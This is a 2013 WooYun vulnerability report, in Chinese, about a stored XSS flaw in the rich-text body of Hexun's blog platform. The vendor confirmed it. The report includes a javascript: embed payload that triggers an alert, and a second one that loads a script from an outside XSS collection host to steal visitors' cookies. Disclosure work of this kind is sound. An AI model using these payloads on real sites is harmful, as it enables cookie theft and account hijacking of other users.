当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041007

漏洞标题:和讯个人博客存储型xss可获取cookie

相关厂商:和讯网

漏洞作者: jadore

提交时间:2013-10-25 17:04

修复时间:2013-12-09 17:05

公开时间:2013-12-09 17:05

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-25: 细节已通知厂商并且等待厂商处理中
2013-10-25: 厂商已经确认,细节仅向厂商公开
2013-11-04: 细节向核心白帽子及相关领域专家公开
2013-11-14: 细节向普通白帽子公开
2013-11-24: 细节向实习白帽子公开
2013-12-09: 细节向公众公开

简要描述:

和讯网创立于1996年,从中国早期金融证券资讯服务脱颖而出,建立了第一个财经资讯垂直网站。经过十六年的专注耕耘,和讯网逐步确立了自己在业内的优势 地位和品牌影响力,成为财经互联网专业、高端及品质的代表。中国互联网信息中心数据显示,和讯网用户中高收入人群高达72%,是互联网平均水平的4倍。
之前分别给和讯提了一个博客标题跟相册的存储型xss,今天再来一发,不过这次出现在正文中,原因就是富文本标签过滤不严格
另外问一句乌云,上次和讯给了我两个6,rank,合计12rank,最后到手的为什么是4啊啊
和讯哥哥,三个洞洞了,求个礼物可以么

详细说明:

和讯网创立于1996年,从中国早期金融证券资讯服务脱颖而出,建立了第一个财经资讯垂直网站。经过十六年的专注耕耘,和讯网逐步确立了自己在业内的优势 地位和品牌影响力,成为财经互联网专业、高端及品质的代表。中国互联网信息中心数据显示,和讯网用户中高收入人群高达72%,是互联网平均水平的4倍。
之前分别给和讯提了一个博客标题跟相册的存储型xss,今天再来一发,不过这次出现在正文中,原因就是富文本表情过滤不严格
首先吐槽一句,目前之前提出的那个标题的xss依旧未处理。

3.png


安全重于泰山…
现在开始我们主题。这次不管标题,进入正文,点击代码,输入
<embed src=”javascript:alert(42)”>
如下图,然后保存

1.png


这样我们就得到了我们想要的弹框

2.png


下一步获取cookie
<embed src=”javascript:var s=document.createElement(‘script’);s.src=’http://xss.tw/4574/’;document.body.appendChild(s);”>

6.png


7.png


8.png


9.png


10.png


顺道鄙视一下asrc的人,连是不是self-xss都分不清

漏洞证明:

rt

修复方案:

三个洞洞了,求个礼物可以么

版权声明:转载请注明来源 jadore@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2013-10-25 18:22

厂商回复:

感谢告知

最新状态:

暂无


漏洞评价:

评论